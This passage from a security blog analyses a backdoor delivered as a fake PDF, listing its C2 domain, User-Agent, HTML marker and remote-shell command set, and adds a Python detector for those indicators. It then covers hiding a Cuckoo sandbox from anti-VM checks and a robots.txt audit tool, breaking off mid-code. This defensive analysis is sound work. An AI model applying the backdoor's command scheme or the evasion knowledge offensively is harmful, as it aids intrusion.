<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi2inJvOjDaCQiPyz1STPhyI_fABfNKqtb_UzcPs0B_UmiRp284MpGKhSGSn2wfbbIXFu_KBzK-GFTmW31xQEbNjH7pvpa_Ou1NkRVpKWoTWjBvk408y02Mji2HIcNILlXz3Ag2kYjCGKk/s1600/PDF4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi2inJvOjDaCQiPyz1STPhyI_fABfNKqtb_UzcPs0B_UmiRp284MpGKhSGSn2wfbbIXFu_KBzK-GFTmW31xQEbNjH7pvpa_Ou1NkRVpKWoTWjBvk408y02Mji2HIcNILlXz3Ag2kYjCGKk/s1600/PDF4.png" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: justify;">
When we run what appears to be a PDF file, the executable drops a real PDF file and opens it. A normal user could think that nothing strange has happened: they received an e-mail with a PDF and now it is open...</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhni9_phJ5leU7PVlCuP4IfQ99cY1suImnsjYUCGxg5FH1Z1CvQlxuog4oomXESU9A7_AR0OU1MzQmtk08QyGGvPE9oTZSe5BxaZz4rRieWMxmLkVBIBALhn2XQJLXEzwOaZOfCkONRrUE/s1600/PDF5.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhni9_phJ5leU7PVlCuP4IfQ99cY1suImnsjYUCGxg5FH1Z1CvQlxuog4oomXESU9A7_AR0OU1MzQmtk08QyGGvPE9oTZSe5BxaZz4rRieWMxmLkVBIBALhn2XQJLXEzwOaZOfCkONRrUE/s1600/PDF5.png" height="265" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div style="text-align: justify;">
... but in the background it also drops another executable, UIODesrvr.exe. This file is the real malware.</div>
<br />
<div style="text-align: center;">
SHA1: <a href="https://www.virustotal.com/en/file/2b2ff60c535ec2a049210455afff7853054a6e61e008188140153683cebb8f8b/analysis/" target="_blank">56bcdac7bbf5f99a496c78e2fff0d9bed96c458e</a> </div>
<br />
If we list the processes running on the machine, we can see that this malware is executing.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiddD2iYs3N6LziXcFbmu4K4wxpMPidyVw7Ly-gE6XAyIJKUVUM9hyphenhyphen0Nk5Et7p5hASb0ErrylC_KT0SJZHbN0XW50SAFA22HH6XuS-hqoApACal6wejNgas4icjwL64filcQ1PAAs6Wrhs/s1600/TaskManager.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiddD2iYs3N6LziXcFbmu4K4wxpMPidyVw7Ly-gE6XAyIJKUVUM9hyphenhyphen0Nk5Et7p5hASb0ErrylC_KT0SJZHbN0XW50SAFA22HH6XuS-hqoApACal6wejNgas4icjwL64filcQ1PAAs6Wrhs/s1600/TaskManager.png" /></a></div>
<h2>
Brief Malware Analysis</h2>
According to its PE header timestamp, the file was compiled on 2014/02/19. That value can be forged by whoever builds the binary, but here it is consistent with the February 2014 lure.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg3XuJVaA1r-oc9l5f3jjN1dVp4UfLeDrn1dkWI4eRArIup3Z4_uLR6DwXFQi31__u_NcYxTbktevQeAeJ8m4W8jYR_WvRgav4F_1SqtDMt63ULirrsZTolxKTSBNqp8ByGVtHN-wb8zwE/s1600/PE_Date.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg3XuJVaA1r-oc9l5f3jjN1dVp4UfLeDrn1dkWI4eRArIup3Z4_uLR6DwXFQi31__u_NcYxTbktevQeAeJ8m4W8jYR_WvRgav4F_1SqtDMt63ULirrsZTolxKTSBNqp8ByGVtHN-wb8zwE/s1600/PE_Date.png" /></a></div>
<br />
<div style="text-align: justify;">
The first thing the malware does is connect to www[.]skyslisten[.]com, which appears to be the C&amp;C server. At the time of writing the server is no longer reachable.</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhznRAdgT6VnkD9ampwmm6cZfXV7YKNvFXw3Di3-KNdK_VRMwnRTOjtekO4uvFiIzjM316KNtDJhXiRTtYVby3msxW5zfRl7fEbRvMlMEJ2tu6C5bW8xLIQUTuGbhfHOqoRP-4v_oIFel8/s1600/URL_IDA_HEX.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhznRAdgT6VnkD9ampwmm6cZfXV7YKNvFXw3Di3-KNdK_VRMwnRTOjtekO4uvFiIzjM316KNtDJhXiRTtYVby3msxW5zfRl7fEbRvMlMEJ2tu6C5bW8xLIQUTuGbhfHOqoRP-4v_oIFel8/s1600/URL_IDA_HEX.png" height="32" width="400" /></a></div>
<br />
<div style="text-align: justify;">
The User-Agent used by the malware is "Mozilla/5.0 (compatible; MSIE 7.0; Windows NT 6.0)".</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgkxucH3dZ0wuHGEWF3ZPxl1D-ukf9vtmP8WTbKKb0EZesqzi-cp8Dmm-oiBqYMoJekC7vA1-FbaQn1DybkQjNGS0s5xuys2vdfvesZqEpg4wHEJTFkTD3d0545FipIUmLHHMpJ8Avq-j4/s1600/User_Agent_IDA_Hexa.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgkxucH3dZ0wuHGEWF3ZPxl1D-ukf9vtmP8WTbKKb0EZesqzi-cp8Dmm-oiBqYMoJekC7vA1-FbaQn1DybkQjNGS0s5xuys2vdfvesZqEpg4wHEJTFkTD3d0545FipIUmLHHMpJ8Avq-j4/s1600/User_Agent_IDA_Hexa.png" height="47" width="400" /></a></div>
<br />
<div style="text-align: justify;">
In IDA we can see that the malware first checks whether the marker "&gt;SC&lt;" appears in the HTML served by the domain above. If it does, it looks for commands embedded in that page and executes them. According to Trend Micro, these are the commands supported by this malware:</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj8wuavmoCov1WqNmscpAD2Yp3tEqmGcXqhHtSnJdsZDpzaL7yd6kYCmLCQ9q0xXp1nC1rIkcvOBhJZbCYica_nB2iNUVNZn9zmZHto8ZzKjotVYMgTA0-1UUZDfRi9YCvsFCVYsp3Vc_8/s1600/commands.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj8wuavmoCov1WqNmscpAD2Yp3tEqmGcXqhHtSnJdsZDpzaL7yd6kYCmLCQ9q0xXp1nC1rIkcvOBhJZbCYica_nB2iNUVNZn9zmZHto8ZzKjotVYMgTA0-1UUZDfRi9YCvsFCVYsp3Vc_8/s1600/commands.png" /></a></div>
<u>HTTP code </u><br />
prefix: “>SC<”<br />
<br />
<u>Commands</u><br />
“run1” open a remote shell<br />
“run2” pipe shell commands from URL1<br />
“run3” pipe shell commands from URL2<br />
“http” pipe shell commands from C2<br />
“x_” sleep for specified number of minutes<br />
<br />
<br />
<br />
<div style="text-align: justify;">
This is the typical behaviour of a backdoor used as a foothold from which to start lateral movement.</div>
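<div style="text-align: justify;">
The indicators gathered so far (C&amp;C host, hard-coded User-Agent, the &gt;SC&lt; marker and the command set) can be turned into a detection, which is what this added Python example does; it is mine, not code from the post or from Trend Micro. One point the post does not make: real IE7 identified itself as "Mozilla/4.0 (compatible; MSIE 7.0; ...)", and as far as I know no Internet Explorer build ever combined "Mozilla/5.0" with "MSIE 7.0", so the User-Agent alone is worth hunting for in proxy logs. The post does not describe how the commands are laid out around the marker; the example assumes whitespace-separated tokens, and the sample request headers and response body are constructed.</div>

```python
import re

# Indicators taken from the post (the UIODesrvr.exe sample analysed there).
C2_HOST = "www.skyslisten.com"
C2_USER_AGENT = "Mozilla/5.0 (compatible; MSIE 7.0; Windows NT 6.0)"
MARKER = ">SC<"
COMMANDS = {
    "run1": "open a remote shell",
    "run2": "pipe shell commands from URL1",
    "run3": "pipe shell commands from URL2",
    "http": "pipe shell commands from C2",
}
SLEEP_RE = re.compile(r"^x_(\d+)$")  # "x_" followed by the number of minutes to sleep
TAG_RE = re.compile(r"<[^>]+>")


def ua_is_anomalous(ua):
    """Real IE7 sent 'Mozilla/4.0 (compatible; MSIE 7.0; ...)'. As far as I know no Internet Explorer
    build ever paired 'Mozilla/5.0' with 'MSIE 7.0', so the hard-coded string is a usable hunting
    signature even after the C2 host changes."""
    return ua.startswith("Mozilla/5.0") and "MSIE 7.0" in ua


def inspect_request(headers):
    """headers: request header name -> value. Returns the names of the matched indicators."""
    hits = []
    if headers.get("Host", "").lower() == C2_HOST:
        hits.append("c2_host")
    ua = headers.get("User-Agent", "")
    if ua == C2_USER_AGENT:
        hits.append("c2_user_agent")
    elif ua_is_anomalous(ua):
        hits.append("anomalous_ie7_user_agent")
    return hits


def extract_commands(body):
    """Locate the >SC< marker in a response body and return the documented tokens that follow it.
    Returns None when the marker is absent. Assumption (the post does not describe the page layout):
    commands follow the marker as whitespace-separated tokens, possibly wrapped in HTML tags."""
    idx = body.find(MARKER)
    if idx < 0:
        return None
    found = []
    for tok in TAG_RE.sub(" ", body[idx + len(MARKER):]).split():
        if tok in COMMANDS:
            found.append((tok, COMMANDS[tok]))
        else:
            m = SLEEP_RE.match(tok)
            if m:
                found.append((tok, f"sleep {int(m.group(1))} minutes"))
    return found


def inspect_transaction(headers, body):
    """Score one HTTP request/response pair against the Siesta indicators."""
    hits = inspect_request(headers)
    commands = extract_commands(body)
    if commands is not None:
        hits.append("sc_marker")
    if "c2_host" in hits or commands:
        verdict = "siesta_c2"
    elif hits:
        verdict = "suspicious"
    else:
        verdict = "clean"
    return {"indicators": hits, "commands": commands or [], "verdict": verdict}


# Constructed sample transactions; the response body layout is invented for illustration.
SAMPLE_REQUEST = {"Host": "www.skyslisten.com", "User-Agent": C2_USER_AGENT}
SAMPLE_BODY = "<html><body><p>Welcome</p><!-- >SC< x_30 run1 --></body></html>"
CLEAN_REQUEST = {"Host": "www.example.com",
                 "User-Agent": "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)"}
CLEAN_BODY = "<html><body>hello</body></html>"

if __name__ == "__main__":
    print(inspect_transaction(SAMPLE_REQUEST, SAMPLE_BODY))
    print(inspect_transaction(CLEAN_REQUEST, CLEAN_BODY))
```

Feed it request headers and bodies reconstructed from a proxy or a full-packet capture; a hit on the host or on the marker is strong, a hit on the User-Agent alone is a lead to investigate.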
<h2>
Tracking the attacker</h2>
<div style="text-align: justify;">
As we said before, the domain www[.]skyslisten[.]com appears to be the C&amp;C server. The picture below shows who registered this domain.</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhK10hb77QwAYQktQ4tuEJ4ch8U5ibP_gYCVDL9KXtwCKIbIgY56i6eOw47d0-ME9keUngKtvYaNsmeUlQLfrGbGYFFVTZhqBsy5KYNpqSXyl1m7IBo8jqz2cNy0ZYajSD-FF3aCgBrzSo/s1600/register.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhK10hb77QwAYQktQ4tuEJ4ch8U5ibP_gYCVDL9KXtwCKIbIgY56i6eOw47d0-ME9keUngKtvYaNsmeUlQLfrGbGYFFVTZhqBsy5KYNpqSXyl1m7IBo8jqz2cNy0ZYajSD-FF3aCgBrzSo/s1600/register.png" /></a></div>
<br />
<div style="text-align: justify;">
The same registrant also registered microsofthomes[.]com. FireEye's report states that this domain is directly connected with the one mentioned above.</div>
<br />
The picture below shows some of the domains registered by the same person: only five out of the roughly 17,000 domains that, according to Trend Micro, were registered with this same e-mail address.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgCzl1zXFMs1K2p0oDQyCRMZ_IQ5OtYuYuCcmvc8Ds6fFbxD7VzQm652LlIATcHWcQGBe2cjM9CqUPXLOf8G6J1Syd6KRZYRqWk3fxBvMiSGtuL0K7-tQ8c3r9_KUqVY0U2j3H1liSXE0g/s1600/Register-II.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgCzl1zXFMs1K2p0oDQyCRMZ_IQ5OtYuYuCcmvc8Ds6fFbxD7VzQm652LlIATcHWcQGBe2cjM9CqUPXLOf8G6J1Syd6KRZYRqWk3fxBvMiSGtuL0K7-tQ8c3r9_KUqVY0U2j3H1liSXE0g/s1600/Register-II.png" /></a></div>
<h2>
Conclusion</h2>
<div style="text-align: justify;">
When we talk about APTs or targeted attacks, well-known sophisticated malware like Stuxnet, Flame and Careto, and the security breaches suffered by companies like Google, RSA, Adobe and Apple, come to my mind... But as we have seen, it is not necessary to develop sophisticated malware to carry out a targeted attack. Obviously, a more sophisticated attack is more likely to succeed...</div>
<br />
<br />Javier Nieto (http://www.blogger.com/profile/05976836878834402718, noreply@blogger.com), 1 comment
<br />tag:blogger.com,1999:blog-3160485247929481680.post-1559452313319615816 | published 2014-02-17T01:28:00.003-08:00 | updated 2014-02-17T08:05:34.163-08:00
<br />Hiding your Cuckoo Sandbox v1.0 from malware in an easy way<div style="text-align: justify;">
Cuckoo v1.0 was published some months ago, but it took me a while to find the time to install it with my friend <a href="https://twitter.com/cor3dump3d" target="_blank">cor3dump3d</a>, who saved me a lot of time...</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
I have seen some valuable new features in this release. Maybe I will write a post about them in the future, but for now I am going to show you how to keep Cuckoo from being detected by malware.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Malware increasingly uses anti-virtualization techniques to avoid being analyzed by sandboxes like Cuckoo; I've noticed a rise in samples with this capability. Modern malware can change its behaviour if it detects that it is running in a virtual environment. If you already use Cuckoo to analyze your samples, you will also have noticed other evasion techniques, such as the detection of debuggers and forensic tools.</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjzYaUs6yrqXZp6fzX5KRgsqfQna1nJkTxExdWUZfFBEBJbbGEm1XlbkaQJv1BrstOtAak4hdrpDGQ1uwxV8lZKChg9IKqdJvftOModvV7XweNXeP7Y7LJigZmrsXdO4p9XDiBT80BpS9g/s1600/Pafish.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjzYaUs6yrqXZp6fzX5KRgsqfQna1nJkTxExdWUZfFBEBJbbGEm1XlbkaQJv1BrstOtAak4hdrpDGQ1uwxV8lZKChg9IKqdJvftOModvV7XweNXeP7Y7LJigZmrsXdO4p9XDiBT80BpS9g/s1600/Pafish.png" height="240" width="400" /></a></div>
<br />
<div style="text-align: justify;">
We want to keep our virtual machine hidden from the malware samples, so we will modify our sandbox to achieve that.</div>
<br />
<h2>
Detecting Virtual Machines with Pafish</h2>
<div style="text-align: justify;">
A year ago I read here: <a href="http://www.alienvault.com/open-threat-exchange/blog/hardening-cuckoo-sandbox-against-vm-aware-malware" target="_blank">Hardening Cuckoo Sandbox against VM aware malware</a> that Alberto Ortega had developed a new tool named Pafish. It runs on Windows and detects whether it is executing inside a virtual machine. Some months ago the same blog reported that malware developers had borrowed this tool's checks and added them to their malware, so that the malicious program could detect a virtual environment and change its behaviour. The link below is a great post about it: <a href="http://www.alienvault.com/open-threat-exchange/blog/how-public-tools-are-used-by-malware-developers-the-antivm-tale" target="_blank">How public tools are used by malware developers, the antivm tale</a></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
So we are going to use this free tool to check whether our virtual machine can be detected by common anti-virtualization techniques. The tool is available at the link below. </div>
<br />
<div style="text-align: center;">
<a href="https://github.com/a0rtega/pafish/tree/master/pafish">https://github.com/a0rtega/pafish/tree/master/pafish</a></div>
<br />
<div style="text-align: justify;">
After running Pafish we get the picture below, which shows that Pafish detected a hard drive with less than 50GB of storage. If you can give your virtual machine more storage, just do it: how many real computers have a disk smaller than 50GB? I don't know any, and for this reason the malware could suspect that it is running in a virtual environment.</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgUG0LXqq3PgvaF4fm3kJEGsH1ENNNk5JsAjtZ1gKyDLpOI5dNSEg9CnxDDktMkgnhacqBGlpAAmi5a9v1IeMv0afHufoUOrS4nQOu9XaC85GXzh5fxnJ7yfBE14ni_kNFqOR8ftlbFkNo/s1600/Pafish_1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgUG0LXqq3PgvaF4fm3kJEGsH1ENNNk5JsAjtZ1gKyDLpOI5dNSEg9CnxDDktMkgnhacqBGlpAAmi5a9v1IeMv0afHufoUOrS4nQOu9XaC85GXzh5fxnJ7yfBE14ni_kNFqOR8ftlbFkNo/s1600/Pafish_1.png" height="216" width="400" /></a></div>
<br />
<div style="text-align: justify;">
In the picture below you can see how Pafish detected the registry keys related to VirtualBox.</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj1Eugy5nME3lJB8dNDoWm5gLipYLKbYy19s8NAwtsnkluJ7lazSKngvxHrei8FVGamOWnGckiP6H1EsqWqga-XreOjYFIgY9QnVJ9t30Dbg0zdMhrOzE0z0ZpibNvSL3gCjCakFUY-Jkk/s1600/Pafish_unpached.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj1Eugy5nME3lJB8dNDoWm5gLipYLKbYy19s8NAwtsnkluJ7lazSKngvxHrei8FVGamOWnGckiP6H1EsqWqga-XreOjYFIgY9QnVJ9t30Dbg0zdMhrOzE0z0ZpibNvSL3gCjCakFUY-Jkk/s1600/Pafish_unpached.png" height="200" width="400" /></a></div>
<br />
The tool writes a pafish.log file containing these lines: <br />
<pre class="brush: java">[pafish] Start
[pafish] Windows version: 5.1 build 2600
[pafish] Sandbox traced using mouse activity
[pafish] Sandbox traced by checking disk size <= 50GB
[pafish] Hooks traced using DeleteFileW method 1
[pafish] VirtualBox traced using Reg key HKLM\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0 "Identifier"
[pafish] VirtualBox traced using Reg key HKLM\HARDWARE\Description\System "SystemBiosVersion"
[pafish] VirtualBox traced using Reg key HKLM\SOFTWARE\Oracle\VirtualBox Guest Additions
[pafish] VirtualBox traced using Reg key HKLM\HARDWARE\Description\System "VideoBiosVersion"
[pafish] VirtualBox traced using file C:\WINDOWS\system32\drivers\VBoxMouse.sys
[pafish] End
</pre>
<h2>
Hiding our Virtual Machine</h2>
<div style="text-align: justify;">
I was reading some interesting blogs when I discovered this entry: <a href="http://kromer.pl/malware-analysis/installing-and-hardening-latest-cuckoo-sandbox-on-gentoo-linux/" target="_blank">Installing and hardening the latest Cuckoo Sandbox on Gentoo Linux</a> which saved me a lot of time.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
</div>
<div style="text-align: justify;">
Hubert Kromer created a modified cuckoomon.dll that avoids being detected by malware, and he shares it here:</div>
<br />
<div style="text-align: center;">
<a href="https://github.com/markedoe/cuckoo-sandbox" target="_blank">https://github.com/markedoe/cuckoo-sandbox</a></div>
<br />
<div style="text-align: justify;">
You only need to replace the original DLL with the modified one at this path: </div>
<pre class="brush: java">/path/to/cuckoo/analyzer/windows/dll/cuckoomon.dll</pre>
<div style="text-align: justify;">
Once the DLL is replaced (you don't need to restart Cuckoo), just submit Pafish.exe to Cuckoo again. You can see the difference between the modified DLL and the original one.</div>
<div style="text-align: justify;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiKpd1eoj51ml3OkAeZXYXR7VCkrxabusFKFxEsp0E0hRCU101H2CYW_IYDJLKdGfCuwd5FP6CnCD5egNCF2x-LY860aBqoUnXN_16rtv8h5tBd8SzJZmkBp1AJOPJQ8SPvwrKouHQ3PYI/s1600/Pafish_Pached_1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiKpd1eoj51ml3OkAeZXYXR7VCkrxabusFKFxEsp0E0hRCU101H2CYW_IYDJLKdGfCuwd5FP6CnCD5egNCF2x-LY860aBqoUnXN_16rtv8h5tBd8SzJZmkBp1AJOPJQ8SPvwrKouHQ3PYI/s1600/Pafish_Pached_1.png" height="201" width="400" /></a></div>
<br />
<div style="text-align: justify;">
The pafish.log file shows that our sandbox is still traced, but most of the traces detected before are now gone:</div>
<pre class="brush: java">[pafish] Start
[pafish] Windows version: 5.1 build 2600
[pafish] Sandbox traced using mouse activity
[pafish] Sandbox traced by checking disk size <= 50GB
[pafish] Hooks traced using DeleteFileW method 1
[pafish] End
</pre>
<br />
Now we need to figure out how to avoid detection based on the lack of mouse activity during our automated analysis. If you have some information about that, let us know!<br />
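<div style="text-align: justify;">
Before hunting for a fix to the remaining traces it helps to diff the two runs programmatically, so here is an added Python example (mine, not code from the post, from Pafish or from Cuckoo) that parses the two pafish.log files reproduced above, reports which traces the modified DLL removed and which remain, and names where each remaining trace originates according to the log text itself (guest registry, files on disk, disk size, mouse input or cuckoomon's hooks). The only input is the two logs shown above.</div>

```python
import re

# The two pafish.log files reproduced above: before and after swapping in the modified cuckoomon.dll.
BEFORE_LOG = r"""
[pafish] Start
[pafish] Windows version: 5.1 build 2600
[pafish] Sandbox traced using mouse activity
[pafish] Sandbox traced by checking disk size <= 50GB
[pafish] Hooks traced using DeleteFileW method 1
[pafish] VirtualBox traced using Reg key HKLM\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0 "Identifier"
[pafish] VirtualBox traced using Reg key HKLM\HARDWARE\Description\System "SystemBiosVersion"
[pafish] VirtualBox traced using Reg key HKLM\SOFTWARE\Oracle\VirtualBox Guest Additions
[pafish] VirtualBox traced using Reg key HKLM\HARDWARE\Description\System "VideoBiosVersion"
[pafish] VirtualBox traced using file C:\WINDOWS\system32\drivers\VBoxMouse.sys
[pafish] End
"""

AFTER_LOG = r"""
[pafish] Start
[pafish] Windows version: 5.1 build 2600
[pafish] Sandbox traced using mouse activity
[pafish] Sandbox traced by checking disk size <= 50GB
[pafish] Hooks traced using DeleteFileW method 1
[pafish] End
"""

TRACE_RE = re.compile(r"^\[pafish\] (\w+) traced (?:using|by) (.+)$")
VERSION_RE = re.compile(r"^\[pafish\] Windows version: (.+)$")


def parse_traces(log_text):
    """Return the set of (category, detail) pairs for every 'traced' line; Start, End and version lines are skipped."""
    traces = set()
    for line in log_text.splitlines():
        m = TRACE_RE.match(line.strip())
        if m:
            traces.add((m.group(1), m.group(2).strip()))
    return traces


def windows_version(log_text):
    for line in log_text.splitlines():
        m = VERSION_RE.match(line.strip())
        if m:
            return m.group(1).strip()
    return None


def source_of(category, detail):
    """Where a trace comes from, read off the wording Pafish itself uses in the log."""
    d = detail.lower()
    if category == "Hooks":
        return "hooks"          # cuckoomon's API hooks are visible to the sample
    if d.startswith("reg key"):
        return "registry"       # hypervisor strings in the guest registry
    if d.startswith("file "):
        return "file"           # guest-additions drivers on disk
    if "disk size" in d:
        return "disk"           # VM configuration (small virtual disk)
    if "mouse" in d:
        return "mouse"          # no human input during the automated run
    return "other"


def compare(before_text, after_text):
    """Diff two runs: what the DLL swap fixed, what still gives the sandbox away, and anything new."""
    before, after = parse_traces(before_text), parse_traces(after_text)
    remaining = sorted(after)
    return {
        "fixed": sorted(before - after),
        "remaining": remaining,
        "new": sorted(after - before),
        "remaining_sources": sorted({source_of(c, d) for c, d in remaining}),
    }


if __name__ == "__main__":
    result = compare(BEFORE_LOG, AFTER_LOG)
    print(f"fixed {len(result['fixed'])}, remaining {len(result['remaining'])}: {result['remaining_sources']}")
    for category, detail in result["remaining"]:
        print(f"  {source_of(category, detail):8} {category}: {detail}")
```

On the logs above the swap removes the five VirtualBox traces and leaves three, none of them coming from the registry or from files on disk: the disk size is a VM configuration choice, the DeleteFileW hook is cuckoomon's own footprint, and the mouse check is the one the post is still looking for an answer to.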
<br />Javier Nieto (http://www.blogger.com/profile/05976836878834402718, noreply@blogger.com), 5 comments
<br />tag:blogger.com,1999:blog-3160485247929481680.post-7176329962058379855 | published 2014-02-09T00:57:00.000-08:00 | updated 2014-02-09T00:57:43.819-08:00
<br />Parsero v0.6 is OUT!!!!!<div style="text-align: justify;">
As you already know, Parsero is a free Python script that automatically audits the robots.txt file of a web server. In just a few seconds you get a lot of the valuable information you need when auditing a website.</div>
<br />
This tool is available for download here:<br />
<br />
<a href="https://github.com/behindthefirewalls/Parsero">https://github.com/behindthefirewalls/Parsero</a><br />
<br />
And here you can read about what Parsero could already do:<br />
<br />
<a href="http://www.behindthefirewalls.com/2013/12/parsero-tool-to-audit-robotstxt.html" target="_blank">http://www.behindthefirewalls.com/2013/12/parsero-tool-to-audit-robotstxt.html </a><br />
<br />
<h2>
How to install Parsero v0.6</h2>
Parsero is really easy to install. In Kali Linux, for example, you only need to run the commands below.<br />
<pre class="brush: java">apt-get install python3
apt-get install python3-pip
pip-3.2 install urllib3
pip-3.2 install beautifulsoup4
git clone https://github.com/behindthefirewalls/Parsero.git
</pre>
<h2>
What's new?</h2>
If you look at the Parsero help, you will see two new features:<br />
<br />
<ul>
<li>"-o" : To only show the available Disallow entries.</li>
<li>"-sb" : To search in Bing indexed Dissallows.</li>
</ul>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjKHw2ftaEKAWCVafpuELSyP-uhzF5JT1NKPZ4hH-bS77ImzxEvTChyAxKqCFC4vzxPT-Tzp8Xmle7dAjH_-iZC-QTUoUWWI5C1h-LqQGoaanYhl41tliSJCZkKgocC0hqxaS06y7o-Gno/s1600/Parsero_v6_1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjKHw2ftaEKAWCVafpuELSyP-uhzF5JT1NKPZ4hH-bS77ImzxEvTChyAxKqCFC4vzxPT-Tzp8Xmle7dAjH_-iZC-QTUoUWWI5C1h-LqQGoaanYhl41tliSJCZkKgocC0hqxaS06y7o-Gno/s1600/Parsero_v6_1.png" height="215" width="400" /></a></div>
<h2>
Showing only the available Disallows</h2>
<div style="text-align: justify;">
In the picture below you will see the difference between using the "-o" option and not using it.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
If the robots.txt file has only a few entries, I recommend not using the "-o" option, because seeing all the results lets you work out what kind of content the administrator wanted to hide. But if the file is large, there is a lot of information to analyze and the audit is easier when you get only the Disallow entries that are actually available.</div>
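<div style="text-align: justify;">
To show what the "-o" option is filtering, here is an added Python example (mine, not Parsero's own code) that parses a constructed robots.txt, resolves each Disallow entry against the site and asks an injectable fetch function for its HTTP status; only_available keeps the entries that answer 200, which is my reading of "available". Wildcard entries such as /*.bak$ cannot be requested as written and are reported as patterns instead. The www.example.com site and the stub status table are constructed so that the example runs offline; http_status shows the live variant with urllib3, the library Parsero installs.</div>

```python
from urllib.parse import urljoin

# Constructed robots.txt in the shape Parsero audits; www.example.com is a placeholder, not a real target.
SAMPLE_ROBOTS = """\
# robots.txt (constructed sample)
User-agent: *
Disallow: /admin/
Disallow: /backup/db.sql
Disallow: /old-site/
Allow: /old-site/public/
Disallow: /*.bak$
Disallow:
Sitemap: http://www.example.com/sitemap.xml

User-agent: Googlebot
Disallow: /private/
Disallow: /admin/
"""


def parse_robots(text):
    """Return (directive, value) pairs in file order, dropping comments and blank lines."""
    entries = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if ":" not in line:
            continue
        key, value = (part.strip() for part in line.split(":", 1))
        entries.append((key.lower(), value))
    return entries


def disallowed_paths(text):
    """Unique Disallow values in order of appearance. An empty Disallow means 'nothing is disallowed'."""
    paths = []
    for key, value in parse_robots(text):
        if key == "disallow" and value and value not in paths:
            paths.append(value)
    return paths


def is_pattern(path):
    """Wildcard entries cannot be requested as-is, so they are reported rather than fetched."""
    return "*" in path or path.endswith("$")


def check_disallows(base_url, text, fetch, only_available=False):
    """Resolve every Disallow entry against base_url and ask fetch(url) for its HTTP status.
    only_available mirrors Parsero's -o: keep only the entries answering 200 (my reading of 'available')."""
    results = []
    for path in disallowed_paths(text):
        url = urljoin(base_url, path)
        results.append((url, "pattern" if is_pattern(path) else fetch(url)))
    if only_available:
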